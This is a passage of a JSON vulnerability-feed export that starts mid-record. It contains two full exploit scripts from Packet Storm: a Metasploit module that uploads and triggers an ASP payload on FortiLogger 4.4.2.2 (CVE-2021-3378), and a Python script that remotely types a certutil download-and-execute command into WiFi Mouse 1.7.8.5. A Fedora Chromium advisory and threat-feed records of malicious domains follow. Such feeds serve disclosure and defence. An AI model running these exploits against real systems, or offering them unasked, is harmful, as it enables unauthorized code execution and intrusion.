"https://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::EXE \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'FortiLogger Arbitrary File Upload Exploit', \n'Description' => %q{ \nThis module exploits an unauthenticated arbitrary file upload \nvia insecure POST request. It has been tested on version 4.4.2.2 in \nWindows 10 Enterprise. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module \n], \n'References' => \n[ \n['CVE', '2021-3378'], \n['URL', 'https://erberkan.github.io/2021/cve-2021-3378/'] \n], \n \n'Platform' => ['win'], \n'Privileged' => false, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ \n'FortiLogger - 4.4.2.2', \n{ \n'Platform' => 'win' \n} \n], \n], \n'DisclosureDate' => '2021-02-26', \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(5000), \nOptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/']) \n], self.class \n) \nend \n \ndef check_product_info \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), \n'method' => 'POST', \n'data' => '', \n'headers' => { \n'Accept' => 'application/json, text/javascript, */*; q=0.01', \n'Accept-Language' => 'en-US,en;q=0.5', \n'Accept-Encoding' => 'gzip, deflate', \n'X-Requested-With' => 'XMLHttpRequest' \n} \n) \n \nreturn res \nend \n \ndef check \nbegin \nres = check_product_info \nif res && res.code == 200 \nif JSON.parse(res.body)['Version'] == '4.4.2.2' \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \nend \nend \n \ndef create_payload \nMsf::Util::EXE.to_exe_asp(generate_payload_exe).to_s \nend \n \ndef exploit \nbegin \nprint_good('Generate Payload !') \ndata = create_payload \n \nboundary = \"----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}\" \npost_data = \"--#{boundary}\\r\\n\" \npost_data << \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"b3r.asp\\\"\\r\\n\" \npost_data << \"Content-Type: image/png\\r\\n\" \npost_data << \"\\r\\n#{data}\\r\\n\" \npost_data << \"--#{boundary}\\r\\n\" \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), \n'ctype' => \"multipart/form-data; boundary=#{boundary}\", \n'data' => post_data, \n'headers' => { \n'Accept' => 'application/json', \n'Accept-Language' => 'en-US,en;q=0.5', \n'X-Requested-With' => 'XMLHttpRequest' \n} \n) \nif res && res.code == 200 \nif JSON.parse(res.body)['Message'] == 'Error in saving file' \nprint_error('Error for upload payload..') \nelse \nprint_good('Payload has been uploaded !') \n \nhandler \n \nprint_status('Executing payload...') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), \n'method' => 'GET' \n}, 5) \nend \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/161601/fortilogger4422-upload.rb.txt"}, {"lastseen": "2021-03-01T16:08:58", "description": "", "published": "2021-02-28T00:00:00", "type": "packetstorm", "title": "WiFi Mouse 1.7.8.5 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-02-28T00:00:00", "id": "PACKETSTORM:161586", "href": "https://packetstormsecurity.com/files/161586/WiFi-Mouse-1.7.8.5-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution \n# Date: 25-02-2021 \n# Author: H4rk3nz0 \n# Vendor Homepage: http://necta.us/ \n# Software Link: http://wifimouse.necta.us/#download \n# Version: 1.7.8.5 \n# Tested on: Windows Enterprise Build 17763 \n \n# Desktop Server software used by mobile app has PIN option which does not to prevent command input. \n# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. \n \n#!/usr/bin/python \n \nfrom socket import socket, AF_INET, SOCK_STREAM \nfrom time import sleep \nimport sys \nimport string \n \ntarget = socket(AF_INET, SOCK_STREAM) \nport = 1978 \n \ntry: \nrhost = sys.argv[1] \nlhost = sys.argv[2] \npayload = sys.argv[3] \nexcept: \nprint(\"USAGE: python \" + sys.argv[0]+ \" <target-ip> <local-http-server-ip> <payload-name>\") \nexit() \n \n \ncharacters={ \n\"A\":\"41\",\"B\":\"42\",\"C\":\"43\",\"D\":\"44\",\"E\":\"45\",\"F\":\"46\",\"G\":\"47\",\"H\":\"48\",\"I\":\"49\",\"J\":\"4a\",\"K\":\"4b\",\"L\":\"4c\",\"M\":\"4d\",\"N\":\"4e\", \n\"O\":\"4f\",\"P\":\"50\",\"Q\":\"51\",\"R\":\"52\",\"S\":\"53\",\"T\":\"54\",\"U\":\"55\",\"V\":\"56\",\"W\":\"57\",\"X\":\"58\",\"Y\":\"59\",\"Z\":\"5a\", \n\"a\":\"61\",\"b\":\"62\",\"c\":\"63\",\"d\":\"64\",\"e\":\"65\",\"f\":\"66\",\"g\":\"67\",\"h\":\"68\",\"i\":\"69\",\"j\":\"6a\",\"k\":\"6b\",\"l\":\"6c\",\"m\":\"6d\",\"n\":\"6e\", \n\"o\":\"6f\",\"p\":\"70\",\"q\":\"71\",\"r\":\"72\",\"s\":\"73\",\"t\":\"74\",\"u\":\"75\",\"v\":\"76\",\"w\":\"77\",\"x\":\"78\",\"y\":\"79\",\"z\":\"7a\", \n\"1\":\"31\",\"2\":\"32\",\"3\":\"33\",\"4\":\"34\",\"5\":\"35\",\"6\":\"36\",\"7\":\"37\",\"8\":\"38\",\"9\":\"39\",\"0\":\"30\", \n\" \":\"20\",\"+\":\"2b\",\"=\":\"3d\",\"/\":\"2f\",\"_\":\"5f\",\"<\":\"3c\", \n\">\":\"3e\",\"[\":\"5b\",\"]\":\"5d\",\"!\":\"21\",\"@\":\"40\",\"#\":\"23\",\"$\":\"24\",\"%\":\"25\",\"^\":\"5e\",\"&\":\"26\",\"*\":\"2a\", \n\"(\":\"28\",\")\":\"29\",\"-\":\"2d\",\"'\":\"27\",'\"':\"22\",\":\":\"3a\",\";\":\"3b\",\"?\":\"3f\",\"`\":\"60\",\"~\":\"7e\", \n\"\\\\\":\"5c\",\"|\":\"7c\",\"{\":\"7b\",\"}\":\"7d\",\",\":\"2c\",\".\":\"2e\"} \n \n \ndef openCMD(): \ntarget.sendto(\"6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a\".decode(\"hex\"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe \n \ndef SendString(string): \nfor char in string: \ntarget.sendto((\"7574663820\" + characters[char] + \"0a\").decode(\"hex\"),(rhost,port)) # Sends Character hex with packet padding \nsleep(0.03) \n \ndef SendReturn(): \ntarget.sendto(\"6b657920203352544e\".decode(\"hex\"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app \nsleep(0.5) \n \ndef exploit(): \nprint(\"[+] 3..2..1..\") \nsleep(2) \nopenCMD() \nprint(\"[+] *Super fast hacker typing*\") \nsleep(1) \nSendString(\"certutil.exe -urlcache -f http://\" + lhost + \"/\" + payload + \" C:\\\\Windows\\\\Temp\\\\\" + payload) \nSendReturn() \nprint(\"[+] Retrieving payload\") \nsleep(3) \nSendString(\"C:\\\\Windows\\\\Temp\\\\\" + payload) \nSendReturn() \nprint(\"[+] Done! Check Your Listener?\") \n \n \ndef main(): \ntarget.connect((rhost,port)) \nexploit() \ntarget.close() \nexit() \n \nif __name__==\"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161586/wifimouse1785-exec.txt"}], "fedora": [{"lastseen": "2021-02-28T23:00:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2021-02-28T17:27:09", "published": "2021-02-28T17:27:09", "id": "FEDORA:A9575304C34D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-88.0.4324.182-1.fc33", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "rst": [{"lastseen": "2021-02-27T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **repair-windows[.]ru** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-02-27T03:00:00.\n IOC tags: **spam**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:4D98FB1F-751D-3EA5-B7A0-C9B5C3D47716", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: repair-windows.ru", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **browser-stat[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2021-02-12T03:00:00, Last seen: 2021-02-26T03:00:00.\n IOC tags: **malware**.\nWhois:\n Created: 2020-11-02 12:26:03, \n Registrar: Internet Domain Service BS Corp, \n Registrant: unknown.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-12T00:00:00", "id": "RST:4130EE30-69BA-3910-A7E8-8E4D968A0F85", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: browser-stat.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-27T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **windows-key-sale[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **2**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-02-27T03:00:00.\n IOC tags: **spam**.\nDomain has DNS A records: 156[.]241.165.74\nWhois:\n Created: 2020-10-21 18:20:22, \n Registrar: unknown, \n Registrant: MAFF AVENUE INC.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:CDF2D575-0A0F-3E72-991E-4DE685B4F64C", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: windows-key-sale.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **check-browser[.]site** in [RST Threat Feed](https://rstcloud.net/profeed) with score **51**.\n First seen: 2021-02-24T03:00:00, Last seen: 2021-02-26T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 23[.]202.231.167,23.217.138.108\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-24T00:00:00", "id": "RST:B524D3AC-0499-3616-A685-1102FFD7B860", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: check-browser.site", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **2020-windows[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2020-11-21T03:00:00, Last seen: 2021-02-26T03:00:00.\n IOC tags: **malware**.\nWhois:\n Created: 2020-06-19 03:40:11, \n Registrar: PDR Ltd dba PublicDomainRegistrycom, \n Registrant: unknown.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-21T00:00:00", "id": "RST:B2D1192F-FCD8-320B-A1A1-3B7D0F381C26", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: 2020-windows.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-27T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **https://raw[.]githubusercontent.com/secwiki/windows-kernel-exploits/master/ms15-076/binary/trebuchet.exe** in [RST Threat Feed](https://rstcloud.net/profeed) with score **30**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-02-27T03:00:00.\n IOC tags: **malware**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:E76397AD-3D70-3319-9752-70836BA797B9", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: https://raw.githubusercontent.com/secwiki/windows-kernel-exploits/master/ms15-076/binary/trebuchet.exe", "type": "rst", "cvss": {}}]}